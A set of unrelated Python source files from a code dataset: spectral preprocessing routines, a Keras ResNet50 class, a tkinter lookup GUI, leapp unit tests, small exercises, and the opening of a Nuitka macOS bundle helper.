fit_value - fit_transform result (m X 1 column vector)
residual - residual (m X 1 column vector)
'''
if X.ndim == 1:
X = X[:, np.newaxis] # 如果一维数组,转成二维
if y.ndim == 1:
y = y[:, np.newaxis] # 如果一维数组,转成二维
if X.shape[0] != y.shape[0]:
raise ValueError('The number of samples is not equal!')
n_samples = X.shape[0]
intercept = np.ones((n_samples, 1)) # offset 截距
A = generate_polynomial(X, order=order)
regression_coefficient = dot(dot(inv(dot(A.T, A)), A.T), y) # 系数(2,1)
fit_value = dot(A, regression_coefficient)
residual = fit_value - y
return {'regression_coefficient':regression_coefficient,
'fit_value':fit_value,
'residual':residual}
# ================ Function 用于光谱列表操作,不在PLS中直接使用 ================
# +++++++++++++++ 多样本操作,针对列 +++++++++++++++
def msc_list(spec_list, ideal_ab=None):
'''
该函数用于MSC多元散射校正,目的与SNV基本相同,主要是消除颗粒分布不均匀及颗粒大小产生的散射影响。
spec----光谱矩阵
MSC针对一组光谱操作每条光谱都与平均光谱进行线性回归,spec_ori = c * spec_mean + d
d----线性平移量(截距常数)
c----倾斜偏移量(回归系数)
CS*b = y 此处的y即为各原始光谱
x=inv(CS'*CS)*CS'*b 求得的x包含c和d
:param spec_list:
:param ideal_ab: 0维数组,(1557,)
:return:
'''
n = len(spec_list)
if n == 1:
raise ValueError('MSC针对多条光谱进行处理!')
elif n > 1:
result_list = []
wavelength = spec_list[0][0, :]
ab_list = [spec[1, :] for spec in spec_list] # 此处ab (1557,)
ab_array = np.array(ab_list)
size_of_ab = ab_array.shape # (10,1557)
# 对于校正集外的光谱进行MSC处理时则需要用到校正集样品的平均光谱ab_mean,
# 即首先求取该光谱的c和d, 再进行MSC变换
if ideal_ab is None:
ab_mean = np.mean(ab_array, axis=0) # (1557,)
elif len(ideal_ab) != len(np.mean(ab_array, axis=0)):
raise ValueError('数据点数不一致,输入参数有误!')
else:
ab_mean = ideal_ab
d_add = np.ones(size_of_ab[1]) # 700, 线性偏移量offset
matrix_A = (np.vstack((ab_mean, d_add))).T # (700,2)
for i in range(n): # 求出每条光谱的c和d,c = b[0] d = b[1]
b = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), ab_array[i, :])
ab_msc = (ab_array[i, :] - b[1]) / b[0] # 利用广播法则
spec_msc = np.vstack((wavelength, ab_msc))
result_list.append(spec_msc)
return result_list
def sgmsc_list(spec_list, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
'''
先进行求导,再进行MSC
:param spec:
:param deriv:
:param window_size:
:param polyorder:
:param ideal_ab:
:return:
'''
n = len(spec_list)
if n == 1:
raise ValueError('MSC针对多条光谱进行处理!')
elif n > 1:
spec_sg_list = sg_list(spec_list, window_size=window_size, polyorder=polyorder, deriv=deriv)
result_list = msc_list(spec_sg_list, ideal_ab=ideal_ab)
return result_list
def mc_list(spec_list, avg_ab=None):
'''
该函数用于MC(mean-centering 均值中心化), 只返回均值中心化后的数据
数据中心化通常是多变量数据建模的第一步,是指数据中的各个变量减去其均值所得的结果,
以研究数据在其均值附近的变化,而不是数据的绝对值。
根据实际问题的不同,有时亦使用其他的数值,而不一定是均值。
:param spec:
:param avg_ab: 0维数组
:return:
'''
n = len(spec_list)
if n == 1:
raise ValueError('MC针对多条光谱进行处理!')
elif n > 1:
result_list = []
wavelength = spec_list[0][0, :]
ab_list = [spec[1, :] for spec in spec_list] # 此处ab (1557,)
ab_array = np.array(ab_list)
if avg_ab is None:
ab_array_mean = np.mean(ab_array, axis=0) # Get the mean of each column
else:
ab_array_mean = avg_ab
ab_array_mc = ab_array - ab_array_mean # broadcast
for i in range(n):
spec_mc = np.vstack((wavelength, ab_array_mc[i, :]))
result_list.append(spec_mc)
return result_list
def zs_list(spec_list, avg_ab=None, std_ab=None):
'''
该函数用于AUTOSCALE(autoscaling, 标准化or均值方差化),
将原数据集各元素减去元素所在列的均值再除以该列元素的标准差。处理的结果:各列均值为0,方差为1
又称:变量标度化,是对数据从变量方向的转换处理,包括二个方面,其一是中心化,其二是标度化。
1. 数据中心化通常是多变量数据建模的第一步,是指数据中的各个变量减去其均值所得的结果,
以研究数据在其均值附近的变化,而不是数据的绝对值。根据实际问题的不同,有时亦使用其他的数值,而不一定是均值。
2. 数据标度化则是指数据除以其估计范围,比如标准偏差。当不同变量的相对数值范围相差很大时,标度化则尤为重要,
其原因在于具有更大方差的变量,其在回归分析时影响亦越大
:param spec_list:
:param avg_ab: 0维数组
:param std_ab: 0维数组
:return:
'''
n = len(spec_list)
if n == 1:
raise ValueError('MC针对多条光谱进行处理!')
elif n > 1:
result_list = []
wavelength = spec_list[0][0, :]
ab_list = [spec[1, :] for spec in spec_list] # 此处ab (1557,)
ab_array = np.array(ab_list)
if avg_ab is None and std_ab is None:
ab_array_mean = np.mean(ab_array, axis=0) # Get the mean of each column
ab_array_mc = ab_array - ab_array_mean # broadcast
stdev = np.std(ab_array_mc, axis=0, ddof=1)
elif avg_ab is not None and std_ab is not None:
ab_array_mean = avg_ab
ab_array_mc = ab_array - ab_array_mean
stdev = std_ab
ab_array_zs = ab_array_mc / stdev
for i in range(n):
spec_zs = np.vstack((wavelength, ab_array_zs[i, :]))
result_list.append(spec_zs)
return result_list
def avg_list(spec_list): # average
n = len(spec_list)
if n == 1:
raise ValueError('MC针对多条光谱进行处理!')
elif n > 1:
wavelength = spec_list[0][0, :]
ab_list = [spec[1, :] for spec in spec_list] # 此处ab (1557,)
ab_array = np.array(ab_list)
ab_array_mean = np.mean(ab_array, axis=0)
result_spec = np.vstack((wavelength, ab_array_mean))
return result_spec
# +++++++++++++++ 单样本操作,针对行 +++++++++++++++
def vn_list(spec_list):
'''
该函数用于VN(Vector Normalization)矢量归一化,目的是使数据具有相同长度,有效去除由于量测数值大小不同所导致的方差。
VN一次针对一条光谱操作, 每条光谱的模长为1
'''
n = len(spec_list)
result_list = []
for i in range(n):
spec = spec_list[i]
wavelength = spec[0, :]
ab = spec[1, :] # (1557,)
ab_vn = ab / np.linalg.norm(ab)
spec_vn = np.vstack((wavelength, ab_vn))
result_list.append(spec_vn)
return result_list
def snv_list(spec_list):
'''
该函数用于SNV(Standardized Normal Variate transform)标准正态变换,
主要是用来消除固体颗粒大小、表面散射以及光程变化对NIR漫反射光谱的影响
SNV一次针对一条光谱操作(基于光谱阵的行)
'''
n = len(spec_list)
result_list = []
for i in range(n):
spec = spec_list[i]
wavelength = spec[0, :]
ab = spec[1, :]
ab_snv = (ab - np.mean(ab)) / np.std(ab, ddof=1)
spec_snv = np.vstack((wavelength, ab_snv))
result_list.append(spec_snv)
return result_list
def eco_list(spec_list):
'''
该函数用于ECO(Eliminate Constant Offset)消除常数偏移量
ECO对每条光谱分别操作
'''
n = len(spec_list)
result_list = []
for i in range(n):
spec = spec_list[i]
wavelength = spec[0, :]
ab = spec[1, :]
ab_sco = ab - np.min(ab)
spec_sco = np.vstack((wavelength, ab_sco))
result_list.append(spec_sco)
return result_list
def ssl_list(spec_list): # 必须含有波长
'''
---与detrend中的linear同---
该函数用于SSL(Subtract Straight Line)减去一条直线
SSL一次针对一条光谱操作,每条光谱波长都与吸光度进行线性回归,吸光度ab = d * calset_wavelength_intersect + f
CS*x = b x=inv(CS'*CS)*CS'*b
原始光谱减去这条拟合的直线
:param spec: 含有波长数据的光谱矩阵,第0行存放x波长,1行存放吸光度
:return:
'''
n = len(spec_list)
result_list = []
for i in range(n):
spec = spec_list[i]
wavelength = spec[0, :]
ab = spec[1, :] # (1557,)
size_of_spec = spec.shape # 第一行是x轴 (2, 1557)
spec_ssl = np.zeros(size_of_spec)
spec_ssl[0, :] = wavelength
f_add = np.ones(size_of_spec[1]) # 用于构造A
matrix_A = (np.vstack((wavelength, f_add))).T # 1557 * 2
r = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), ab)
spec_ssl[1:, :] = ab - dot(matrix_A, r)
result_list.append(spec_ssl)
return result_list
def mmn_list(spec_list, norm_min=0, norm_max=1): # min max normalize
n = len(spec_list)
result_list = []
for i in range(n):
spec = spec_list[i]
wavelength = spec[0, :]
ab = spec[1, :]
xmin = np.min(ab)
xmax = np.max(ab)
ab_mmn = norm_min + (ab - xmin) * (norm_max - norm_min) / (xmax - xmin)
spec_mmn = np.vstack((wavelength, ab_mmn))
result_list.append(spec_mmn)
return result_list
def sg_list(spec_list, window_size=11, polyorder=2, deriv=1):
'''
:param spec_list:
:param window_size: must be odd and bigger than 2
:param polyorder: must be bigger than deriv
:param deriv:
:return:
'''
try:
window_size = np.abs(np.int(window_size))
polyorder = np.abs(np.int(polyorder))
except ValueError as msg:
raise ValueError("window_size and polyorder have to be of type int")
if window_size % 2 != 1 or window_size < 2:
raise ValueError("window_size size must be a positive odd number")
if window_size < polyorder: # polyorder must be less than window_size
raise ValueError("window_size is too small for the polynomials polyorder")
if deriv > polyorder: # 'deriv' must be less than or equal to 'polyorder'
raise ValueError("请调小导数阶数!")
n = len(spec_list)
half_size = window_size // 2
result_list = []
# 计算SG系数
coef = np.zeros((window_size, polyorder+1))
for i in range(coef.shape[0]):
for j in range(coef.shape[1]):
coef[i, j] = np.power(i - int(window_size / 2), j)
c = dot(inv(dot(coef.T, coef)), coef.T)
# 拷贝SG系数
coefs = np.zeros(window_size)
for k in range(window_size):
if deriv == 2: # 需要调整系数
coefs[k] = c[deriv, k] * 2
elif deriv == 3: # 需要调整系数
coefs[k] = c[deriv, k] * 6
elif deriv == 4: # 需要调整系数
coefs[k] = c[deriv, k] * 24
else:
coefs[k] = c[deriv, k]
# 处理吸光度
for i in range(n):
spec = spec_list[i]
p = spec.shape[1]
tempdata = np.zeros(p)
wavelength = spec[0, :]
ab = spec[1, :]
p = spec.shape[1]
for j in range(0, p-window_size+1):
data_window = ab[j:j+window_size]
new_y = inner(coefs, data_window)
tempdata[j + half_size] = new_y
# 处理两端的数据
for j in range(0, half_size):
tempdata[j] = tempdata[half_size]
for j in range(p-half_size, p):
tempdata[j] = tempdata[p - half_size - 1]
# 导数
if deriv > 0:
x_step = wavelength[1] - wavelength[0]
x_step = np.power(x_step, deriv)
ab_sg = tempdata / x_step
else:
ab_sg = tempdata
spec_sg = np.vstack((wavelength, ab_sg))
result_list.append(spec_sg)
return result_list
def sgsnv_list(spec_list, window_size=11, polyorder=2, deriv=1):
'''
:param spec_list:
:param window_size:
:param polyorder:
:param deriv:
:return:
'''
spec_sg_list = sg_list(spec_list, window_size, polyorder, deriv)
result_list = snv_list(spec_sg_list)
return result_list
def sgssl_list(spec_list, window_size=11, polyorder=2, deriv=1):
'''
:param spec_list:
:param window_size:
:param polyorder:
:param deriv:
:return:
'''
spec_sg_list = sg_list(spec_list, window_size, polyorder, deriv)
result_list = ssl_list(spec_sg_list)
return result_list
|
993,506 | de5fb3e0dfd8e5664b78b377e6abea106a2d4f09 | def testies():
my_dict = {'url' : ['url1'], # list of urls
'fnum' : [2], # number of files in each url
'sheet': [None]} # sheet number of every file per url, respectively to url
print(my_dict['url'], my_dict['sheet'])
my_dict['path'] = []
temp_sheet = []
for i, url in enumerate(my_dict['url']):
for file in range(my_dict['fnum'][i]):
path = url+'_'+str(file+1)
print('extracting {}'.format(path))
my_dict['path'].append(path)
temp_sheet.append(my_dict['sheet'][i])
my_dict['sheet'] = temp_sheet
print(my_dict)
if __name__ == "__main__":
testies() |
993,507 | 254550e20cfc447edfb7abbbadf43245779dc2a9 | #! /usr/bin/env python
PACKAGE='wj_716_lidar'
from dynamic_reconfigure.parameter_generator_catkin import *
#from math import pi
#from driver_base.msg import SensorLevels
gen = ParameterGenerator()
# Name Type Reconfiguration level Description Default Min Max
gen.add("min_ang", double_t, 0, "The angle of the first range measurement [rad].", -3.14, -3.14, 3.14)
gen.add("max_ang", double_t, 0, "The angle of the last range measurement [rad].", 3.14, -3.14, 3.14)
gen.add("angle_increment",double_t, 0, "The angle_increment of the first range measurement [rad].", 0.00582, 0.00582, 0.00582)
gen.add("time_increment", double_t, 0, "The time_increment[s].", 0.00006167129, 0.00006167129, 0.00006167129)
gen.add("range_min", int_t, 0, "The range_min [m].", 0, 0, 30)
gen.add("range_max", int_t, 0, "The range_max[m].", 30, 0, 30)
gen.add("resize", int_t, 0, "The resize[num].", 811, 0, 811)
gen.add("frame_id", str_t, 0, "The TF frame in which laser scans will be returned.", "laser")
#gen.add("intensity", bool_t, SensorLevels.RECONFIGURE_RUNNING, "Whether or not the TiM3xx returns intensity values.", True)
# gen.add("cluster", int_t, SensorLevels.RECONFIGURE_RUNNING, "The number of adjacent range measurements to cluster into a single reading.", 1, 0, 99)
#gen.add("skip", int_t, SensorLevels.RECONFIGURE_RUNNING, "The number of scans to skip between each measured scan.", 0, 0, 9)
# gen.add("port", str_t, SensorLevels.RECONFIGURE_CLOSE, "The serial port where the TiM3xx device can be found.", "/dev/ttyACM0")
# gen.add("calibrate_time", bool_t, SensorLevels.RECONFIGURE_CLOSE, "Whether the node should calibrate the TiM3xx's time offset.", True)
#gen.add("time_offset", double_t, SensorLevels.RECONFIGURE_RUNNING, "An offset to add to the time stamp before publication of a scan [s].", -0.001, -0.25, 0.25)
exit(gen.generate(PACKAGE, "wj_716_lidar", "wj_716_lidar"))
|
993,508 | 833ae1225e288dc63c7414bee6a0277f4083f212 | from tensorflow.keras.layers import Conv2D, BatchNormalization, Activation
from tensorflow.keras.layers import Input, ZeroPadding2D, MaxPooling2D, Add
from tensorflow.keras.layers import AveragePooling2D, Flatten, Dense
from tensorflow.keras.models import Model
from tensorflow.keras.initializers import glorot_uniform
class Resnet50:
def __init__(self, input_shape, classes):
"""
Constructor of Resnet50
Arguments:
input_shape -> tuple; Shape of input tensor
classes -> integer; Number of classes
"""
self.input_shape = input_shape
self.classes = classes
self.build_model()
def main_path_block(self, x, filters, kernel_size, padding, conv_name, bn_name, activation = None, strides = (1, 1)):
"""
Implementation of a main path block
Arguments:
x -> tensor; Input Tensor
filters -> integer; Number of filters in the convolutional layer
padding -> string; Type of padding in the convolutional layer
conv_name -> string; Name of the convolutional layer
bn_name -> string; Name of the batch normalization layer
Output:
returns -> tensor; Downsampled tensor
"""
# Convolutional Layer
x = Conv2D(
filters = filters,
kernel_size = kernel_size,
strides = strides,
padding = padding,
name = conv_name,
kernel_initializer = glorot_uniform(seed = 0)
)(x)
# Batch Normalization Layer
x = BatchNormalization(axis = 3, name = bn_name)(x)
# Activation Layer
if activation != None:
x = Activation(activation)(x)
return x
def identity_block(self, input_tensor, middle_filter_size, filters, stage, block):
"""
Implementation of Identity Block
Arguments:
input_tensor -> tensor; Input Tensor (n, h, w, c)
middle_filter_size -> integer; Size of filter in the middle convolutional block
filters -> integer list; Number of filters in the convolutional blocks
stage -> integer; Denotes position of the block in the network
block -> string; Denotes name of the block
Output:
returns -> tensor; Output Tensor (h, w, c)
"""
# Set the naming convention
conv_name_base = 'res' + str(stage) + block + '_branch'
batch_norm_name_base = 'batch_norm' + str(stage) + block + '_branch'
x_shortcut = input_tensor
# First Block of main path
x = self.main_path_block(
input_tensor,
filters[0],
(1, 1),
'valid',
conv_name_base + '2a',
batch_norm_name_base + '2a',
'relu'
)
# Middle Block of main path
x = self.main_path_block(
x,
filters[1],
(
middle_filter_size,
middle_filter_size
),
'same',
conv_name_base + '2b',
batch_norm_name_base + '2b',
'relu'
)
# Last Block of main path
x = self.main_path_block(
x,
filters[2],
(1, 1),
'valid',
conv_name_base + '2c',
batch_norm_name_base + '2c',
'relu'
)
# Skip Connection
x = Add()([x, x_shortcut])
x = Activation('relu')(x)
return x
def convolutional_block(self, input_tensor, middle_filter_size, filters, stage, block, stride = 2):
"""
Implementation of Convolutional Block
Arguments:
input_tensor -> tensor; Input Tensor (n, h, w, c)
middle_filter_size -> integer; Size of filter in the middle convolutional block
filters -> integer list; Number of filters in the convolutional blocks
stage -> integer; Denotes position of the block in the network
block -> string; Denotes name of the block
stride -> integer; Stride in the convolutional layer
Output:
returns -> tensor; Output Tensor (h, w, c)
"""
# Set the naming convention
conv_name_base = 'res' + str(stage) + block + '_branch'
batch_norm_name_base = 'batch_norm' + str(stage) + block + '_branch'
x_shortcut = input_tensor
## MAIN PATH ##
# First Block of Main Path
x = self.main_path_block(
input_tensor,
filters[0],
(1, 1),
'valid',
conv_name_base + '2a',
batch_norm_name_base + '2a',
'relu',
(stride, stride)
)
# Middle Block of main path
x = self.main_path_block(
x,
filters[1],
(
middle_filter_size,
middle_filter_size
),
'same',
conv_name_base + '2b',
batch_norm_name_base + '2b',
'relu'
)
# Last Block of main path
x = self.main_path_block(
x,
filters[2],
(1, 1),
'valid',
conv_name_base + '2c',
batch_norm_name_base + '2c',
None
)
## Skip Connection Convolutional Block ##
x_shortcut = self.main_path_block(
x_shortcut,
filters[2],
(1, 1),
'valid',
conv_name_base + '1',
batch_norm_name_base + '1',
None,
(stride, stride)
)
# Skip Connection
x = Add()([x, x_shortcut])
x = Activation('relu')(x)
return x
def build_model(self):
"""
Implementation of the Resnet50 Architecture
"""
input_placeholder = Input(shape = self.input_shape)
x = ZeroPadding2D((3, 3))(input_placeholder)
# Stage 1
x = self.main_path_block(x, 64, (7, 7), 'valid', 'conv1', 'bn_conv1', 'relu', (2, 2))
x = MaxPooling2D((3, 3), strides = (2, 2))(x)
# Stage 2
x = self.convolutional_block(x, 3, [64, 64, 256], 2, 'a', 1)
x = self.identity_block(x, 3, [64, 64, 256], 2, 'b')
x = self.identity_block(x, 3, [64, 64, 256], 2, 'c')
# Stage 3
x = self.convolutional_block(x, 3, [128, 128, 512], 3, 'a', 2)
x = self.identity_block(x, 3, [128, 128, 512], 3, 'b')
x = self.identity_block(x, 3, [128, 128, 512], 3, 'c')
x = self.identity_block(x, 3, [128, 128, 512], 3, 'd')
# Stage 4
x = self.convolutional_block(x, 3, [256, 256, 1024], 4, 'a', 2)
x = self.identity_block(x, 3, [256, 256, 1024], 4, 'b')
x = self.identity_block(x, 3, [256, 256, 1024], 4, 'c')
x = self.identity_block(x, 3, [256, 256, 1024], 4, 'd')
x = self.identity_block(x, 3, [256, 256, 1024], 4, 'e')
x = self.identity_block(x, 3, [256, 256, 1024], 4, 'f')
# Stage 5
x = self.convolutional_block(x, 3, [512, 512, 2048], 5, 'a', 2)
x = self.identity_block(x, 3, [512, 512, 2048], 5, 'b')
x = self.identity_block(x, 3, [512, 512, 2048], 5, 'c')
# Average Pooling Layer
x = AveragePooling2D((2, 2), name = 'avg_pool')(x)
# Fully Connected Layer
x = Flatten()(x)
x = Dense(
self.classes,
activation = 'softmax',
name = 'fc_' + str(self.classes),
kernel_initializer = glorot_uniform(seed = 0)
)(x)
self.model = Model(input_placeholder, x, name = 'Resnet50')
def summary(self):
self.model.summary()
|
993,509 | d4ba5a4d7ebc2427d5a8725c671c4728b76fca29 | #coding:utf-8
"""
多继承: 一个类可以同时继承多个父类
会将多个父类的方法属性继承过来
""" |
993,510 | 74ad320f5a7d676a94ab26da09ab46280875c5ea | import random
import sys
sys.setrecursionlimit(5000)
sys.modules['_decimal'] = None
import decimal
from decimal import *
from decimal import Decimal
getcontext().Emin = -10 * 10000
getcontext().Emax = 10 * 10000
getcontext().traps[Overflow] = 0
getcontext().traps[Underflow] = 0
getcontext().traps[DivisionByZero] = 0
getcontext().traps[InvalidOperation] = 0
getcontext().prec = 100
class Naga:
"""
Class ini mengandung atribut-atribut sebuah naga.
"""
def __init__(self, nama, hp_maks, attack, defense):
# type: (str, Decimal, Decimal, Decimal) -> None
self.nama: str = nama
self.hp_sementara: Decimal = hp_maks
self.hp_maks: Decimal = hp_maks
self.attack: Decimal = attack
self.defense: Decimal = defense
def serang(self, musuh):
# type: (Naga) -> str
damage: Decimal = self.attack - musuh.defense if self.attack > musuh.defense else 0
musuh.hp_sementara -= damage
return str(self.nama) + " mendaratkan serangan dengan damage sebesar " + str(damage) + " kepada " + \
str(musuh.nama) + ". HP sementara " + str(musuh.nama) + " sekarang adalah " + \
str(musuh.hp_sementara) + "."
def __str__(self):
# type: () -> str
res: str = "" # initial value
res += "Nama: " + str(self.nama) + "\n"
res += "HP: " + str(self.hp_sementara) + "/" + str(self.hp_maks) + "\n"
res += "Attack: " + str(self.attack) + "\n"
res += "Defense: " + str(self.defense) + "\n"
return res
daftar_naga: list = [
Naga("Tara", Decimal("5e4"), Decimal("3.5e3"), Decimal("2.47e3")),
Naga("Eko", Decimal("4.85e4"), Decimal("3.44e3"), Decimal("2.75e3")),
Naga("Adi", Decimal("5.11e4"), Decimal("3.33e3"), Decimal("2.49e3"))
]
def main():
"""
Fungsi ini dipakai untuk run program.
:return:
"""
print("Berikut adalah daftar naga yang tersedia.")
for naga in daftar_naga:
naga.hp_sementara = naga.hp_maks
print(naga)
indeks_naga: int = int(input("Tolong masukkan indeks dari naga pilihan Anda: "))
while indeks_naga < 0 or indeks_naga >= len(daftar_naga):
indeks_naga = int(input("Maaf, input Anda tidak sah! Tolong masukkan indeks dari naga pilihan Anda: "))
naga_pilihan: Naga = daftar_naga[indeks_naga]
naga_musuh: Naga = daftar_naga[random.randint(0, len(daftar_naga) - 1)]
print(naga_pilihan)
print(naga_musuh)
giliran: int = 0 # nilai semula
while naga_pilihan.hp_sementara >= 0 and naga_musuh.hp_sementara >= 0:
giliran += 1
# Giliran Anda adalah ketika nilai 'giliran' itu ganjil dan giliran musuh adalah ketika nilai 'giliran'
# itu genap
if giliran % 2 == 1:
print(naga_pilihan.serang(naga_musuh))
else:
print(naga_musuh.serang(naga_pilihan))
if naga_musuh.hp_sementara < 0:
print("Anda menang!!!")
break
if naga_pilihan.hp_sementara < 0:
print("Anda kalah!!!")
break
print("Tekan Y untuk ya.")
print("Tekan tombol apapun yang lainnya untuk tidak.")
tanya: str = input("Apakah Anda mau bertarung lagi? ")
if tanya == "Y":
main()
else:
sys.exit()
if __name__ == '__main__':
main()
|
993,511 | f1c1f09653087f5e2c4702e8fd5e4acd67f3c515 | import tkinter
import tkinter.messagebox
import pickle
# main (root) GUI menu
class CrudGUI:
def __init__(self, master):
self.master = master
self.master.title('Welcome Menu')
self.top_frame = tkinter.Frame(self.master)
self.bottom_frame = tkinter.Frame(self.master)
self.radio_var = tkinter.IntVar()
self.radio_var.set(1)
# create the radio buttons
self.look = tkinter.Radiobutton(self.top_frame, text='Look up customer',
variable=self.radio_var, value=1)
self.add = tkinter.Radiobutton(self.top_frame, text='Add Customer',
variable=self.radio_var, value=2)
self.change = tkinter.Radiobutton(self.top_frame, text='Change customer email',
variable=self.radio_var, value=3)
self.delete = tkinter.Radiobutton(self.top_frame, text='Delete customer',
variable=self.radio_var, value=4)
# pack the radio buttons
self.look.pack(anchor='w', padx=20)
self.add.pack(anchor='w', padx=20)
self.change.pack(anchor='w', padx=20)
self.delete.pack(anchor='w', padx=20)
# create ok and quit buttons
self.ok_button = tkinter.Button(self.bottom_frame, text='OK', command=self.open_menu)
self.quit_button = tkinter.Button(self.bottom_frame, text='QUIT', command=self.master.destroy)
# pack the buttons
self.ok_button.pack(side='left')
self.quit_button.pack(side='left')
# pack the frames
self.top_frame.pack()
self.bottom_frame.pack()
def open_menu(self):
if self.radio_var.get() == 1:
search = LookGUI(self.master)
else:
tkinter.messagebox.showinfo('Function', 'still under construction')
class LookGUI:
def __init__(self, master):
# open the file, load to customers, close file. Do in each class
try:
input_file = open("customer_file.dat", 'rb')
self.customers = pickle.load(input_file)
input_file.close()
except (FileNotFoundError, IOError):
self.customers = {}
# tkinter.Toplevel() is like tkinter.Frame() but it opens in a new window
self.look = tkinter.Toplevel(master)
self.look.title('Search for customer')
# create Frames for this Toplevel window
self.top_frame = tkinter.Frame(self.look)
self.middle_frame = tkinter.Frame(self.look)
self.bottom_frame = tkinter.Frame(self.look)
# widgets for top frame - label and entry box for name
self.search_label = tkinter.Label(self.top_frame, text='Enter customer name to look for: ')
self.search_entry = tkinter.Entry(self.top_frame, width=15)
# pack top frame
self.search_label.pack(side='left')
self.search_entry.pack(side='left')
# middle frame - label for results
self.value = tkinter.StringVar()
self.info = tkinter.Label(self.middle_frame, text='Results: ')
self.result_label = tkinter.Label(self.middle_frame, textvariable=self.value)
# pack Middle frame
self.info.pack(side='left')
self.result_label.pack(side='left')
# buttons for bottom frame
self.search_button = tkinter.Button(self.bottom_frame, text='Search', command=self.search)
self.back_button = tkinter.Button(self.bottom_frame, text='Main Menu', command=self.back)
# pack bottom frame
self.search_button.pack(side='left')
self.back_button.pack(side='left')
# pack frames
self.top_frame.pack()
self.middle_frame.pack()
self.bottom_frame.pack()
def search(self):
name = self.search_entry.get()
result = self.customers.get(name, 'Not Found')
self.value.set(result)
def back(self):
self.look.destroy()
def main():
# create a window
root = tkinter.Tk()
# call the GUI and send it the root menu
menu_gui = CrudGUI(root)
# control the mainloop from main instead of the class
root.mainloop()
main()
|
993,512 | 7aee90f77331e2779884f28c7d13f2736d545d2d | import pytest
from leapp.exceptions import StopActorExecutionError
from leapp.libraries.actor import initrdinclude
from leapp.libraries.stdlib import api, CalledProcessError
from leapp.libraries.common.testutils import CurrentActorMocked, logger_mocked
from leapp.models import InitrdIncludes, InstalledTargetKernelVersion
INCLUDES1 = ["/file1", "/file2", "/dir/ect/ory/file3"]
INCLUDES2 = ["/file4", "/file5"]
KERNEL_VERSION = "4.18.0"
def raise_call_error(args=None):
raise CalledProcessError(
message='A Leapp Command Error occured.',
command=args,
result={'signal': None, 'exit_code': 1, 'pid': 0, 'stdout': 'fake', 'stderr': 'fake'})
class RunMocked(object):
def __init__(self, raise_err=False):
self.called = 0
self.args = []
self.raise_err = raise_err
def __call__(self, args):
self.called += 1
self.args = args
if self.raise_err:
raise_call_error(args)
def test_no_includes(monkeypatch):
run_mocked = RunMocked()
monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(msgs=[]))
monkeypatch.setattr(api, 'current_logger', logger_mocked())
monkeypatch.setattr(initrdinclude, 'run', run_mocked)
initrdinclude.process()
assert "No additional files required to add into the initrd." in api.current_logger.dbgmsg
assert not run_mocked.called
def test_no_kernel_version(monkeypatch):
run_mocked = RunMocked()
monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2)]))
monkeypatch.setattr(initrdinclude, 'run', run_mocked)
with pytest.raises(StopActorExecutionError) as e:
initrdinclude.process()
assert 'Cannot get version of the installed RHEL-8 kernel' in str(e)
assert not run_mocked.called
def test_dracut_fail(monkeypatch):
run_mocked = RunMocked(raise_err=True)
monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2),
InstalledTargetKernelVersion(version=KERNEL_VERSION)]))
monkeypatch.setattr(initrdinclude, 'run', run_mocked)
with pytest.raises(StopActorExecutionError) as e:
initrdinclude.process()
assert 'Cannot regenerate dracut image' in str(e)
assert run_mocked.called
def test_flawless(monkeypatch):
run_mocked = RunMocked()
monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2),
InstalledTargetKernelVersion(version=KERNEL_VERSION)]))
monkeypatch.setattr(initrdinclude, 'run', run_mocked)
initrdinclude.process()
assert run_mocked.called
for f in INCLUDES1 + INCLUDES2:
assert (f in arg for arg in run_mocked.args)
|
993,513 | 64f3495358e96fd438f06e72cbb4e81c64c7982f | # Time: O(n), where n=size(tree)
# Space: O(logn), stack space ~height of tree
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
"""
Created util function with left, and right indices,
to avoid re-creating sub arrays using nums[:mid],nums[mid+1:]
"""
return self.util(nums, 0, len(nums)-1)
def util(self, nums, left, right):
if left>right:
return None
mid = (left+right)//2
root = TreeNode(nums[mid])
root.left = self.util(nums, left,mid-1)
root.right = self.util(nums, mid+1, right)
return root
|
993,514 | 95277f65eee48987f77ff3f2c4c4c967da7a888b | #dict basics
fares = {10,20,30}
print(type(fares))#set
titanicData = {'id':(5,7,10), 'fare':(10,20,30), 'Sex':['Male','Female','NA']}
print(type(titanicData))
#tuple accessing
titanicData['id']
titanicData['Sex']
titanicData['pid']#if acces like this will throw error
titanicData.get('pid')#no error
type(titanicData.get('pid'))#NoneType. Means no data with 'pid' in titanicData variable.
#Padas.dataframe and dict
import pandas as pd
titanicDF = pd.DataFrame(titanicData)
type(titanicDF)
titanicDF['id']
print(titanicDF['id'])#int
titanicDF['Sex']
type(titanicDF['Sex'])#Series
|
993,515 | abc6fe125b375671e67a73275169372bef70edc3 | # Copyright 2023, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" For macOS application bundle creation
"""
import os
from nuitka import Options, OutputDirectories
from nuitka.containers.OrderedDicts import OrderedDict
from .FileOperations import copyFile, makePath, openTextFile
from .Images import convertImageToIconFormat
def createPlistInfoFile(logger, onefile):
# Many details, pylint: disable=too-many-locals
import plistlib
if Options.isStandaloneMode():
bundle_dir = os.path.dirname(OutputDirectories.getStandaloneDirectoryPath())
else:
bundle_dir = os.path.dirname(
OutputDirectories.getResultRunFilename(onefile=onefile)
)
result_filename = OutputDirectories.getResultFullpath(onefile=onefile)
app_name = Options.getMacOSAppName() or os.path.basename(result_filename)
